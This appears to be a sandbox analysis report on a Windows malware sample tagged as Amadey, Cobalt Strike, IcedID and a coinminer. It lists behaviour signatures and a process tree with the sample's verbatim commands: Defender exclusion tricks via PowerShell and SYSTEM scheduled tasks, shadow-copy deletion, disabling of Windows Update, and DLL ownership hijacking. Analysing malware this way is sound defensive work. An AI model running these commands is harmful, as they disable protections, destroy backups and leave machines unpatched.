Analysis

  • max time kernel
    135s
  • max time network
    153s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260911-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260911-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    16/09/2026, 18:13

General

  • Target
    2026-09-16_abf64ff2e0a99380417a81c10f3fa8d0_amadey_cobalt-strike_coinminer_glassworm_icedid_luca-ste.exe
  • Size 24.6MB
  • Sample260916-wt6ngsys5l
  • SHA256 1c7c8a407f3a6b37f7734b21ef169fc8b79d9fc6117e9b89741bbba89e9ae4c8
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 16 IoCs
  • Detects executables calling ClearMyTracksByProcess 1 IoCs
  • Detects executables containing artifacts associated with disabling Widnows Defender 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Possible privilege escalation attempt 23 IoCs
  • Disables service(s) 3 TTPs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 29 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Control Panel 4 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2026-09-16_abf64ff2e0a99380417a81c10f3fa8d0_amadey_cobalt-strike_coinminer_glassworm_icedid_luca-ste.exe
    "C:\Users\Admin\AppData\Local\Temp\2026-09-16_abf64ff2e0a99380417a81c10f3fa8d0_amadey_cobalt-strike_coinminer_glassworm_icedid_luca-ste.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:4912
  • C:\Users\Public\ubUHSK\2akOhw.exe
    "C:\Users\Public\ubUHSK\2akOhw.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2888
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:3076
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\ubUHSK\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:5204
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\ubUHSK\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4972
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:5056
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:2656
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:4392
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4312
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:3496
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:3836
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:3948
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4840
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:1124
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:4936
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:2292
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:4732
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:1096
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:5584
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:3216
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:780
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:5676
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:1432
                        • C:\Program Files (x86)\7AAHcm\NoGF2e.exe
                          "C:\Program Files (x86)\7AAHcm\NoGF2e.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:4688
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            PID:2836
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\7AAHcm" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:5908
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\7AAHcm" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:4972
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4336
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:3696
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:4256
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:2748
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\7AAHcm\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:1516
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\7AAHcm\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:1600
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:5672
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Delete /TN "Task1" /F
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:5920
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:5816
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2764
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:5924
                            • C:\Windows\SysWOW64\sc.exe
                              sc config wuauserv start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:3496
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure wuauserv reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              PID:4120
                            • C:\Windows\SysWOW64\net.exe
                              net stop UsoSvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:5452
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop UsoSvc
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:784
                            • C:\Windows\SysWOW64\sc.exe
                              sc config UsoSvc start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:1212
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure UsoSvc reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:6036
                            • C:\Windows\SysWOW64\net.exe
                              net stop uhssvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:5308
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop uhssvc
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:1316
                            • C:\Windows\SysWOW64\sc.exe
                              sc config uhssvc start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:3168
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure uhssvc reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              PID:5832
                            • C:\Windows\SysWOW64\net.exe
                              net stop WaaSMedicSvc
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:5780
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop WaaSMedicSvc
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:4276
                            • C:\Windows\SysWOW64\sc.exe
                              sc config WaaSMedicSvc start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:1808
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure WaaSMedicSvc reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:3724
                            • C:\Windows\SysWOW64\takeown.exe
                              takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5264
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:1488
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3928
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:5244
                            • C:\Windows\SysWOW64\takeown.exe
                              takeown /f C:\Windows\System32\wuaueng.dll
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2960
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:3136
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4788
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:5812
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:5828
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:5612
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2932
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3960
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\7AAHcm" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2976
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\7AAHcm" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:2860
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\7AAHcm" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3404
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\7AAHcm" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:2732
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\7AAHcm\NoGF2e.exe" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3700
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\7AAHcm\NoGF2e.exe" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:4836
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\7AAHcm\NoGF2e.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:5584
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\7AAHcm\NoGF2e.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:1388
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\7AAHcm\NoGF2e.exe" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:780
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\7AAHcm\NoGF2e.exe" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:1432
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\7AAHcm\image.png" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2952
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\7AAHcm\image.png" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:2936
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\7AAHcm\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:1892
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\7AAHcm\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:3756
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\7AAHcm\image.png" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:1820
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\7AAHcm\image.png" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:5336
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\7AAHcm\thumbs.db" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            PID:4232
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\7AAHcm\thumbs.db" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:2084
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\7AAHcm\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:1792
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\7AAHcm\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:2564
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\7AAHcm\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:3312
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\7AAHcm\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:1264
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            • System Location Discovery: System Language Discovery
                            PID:2268
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:5092
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                                PID:1664
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Delete /TN "Task1" /F
                                4⤵
                                  PID:2312
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c icacls "C:\Program Files (x86)\7AAHcm\XPSPLOG.dll" /inheritance:r
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:1768
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files (x86)\7AAHcm\XPSPLOG.dll" /inheritance:r
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
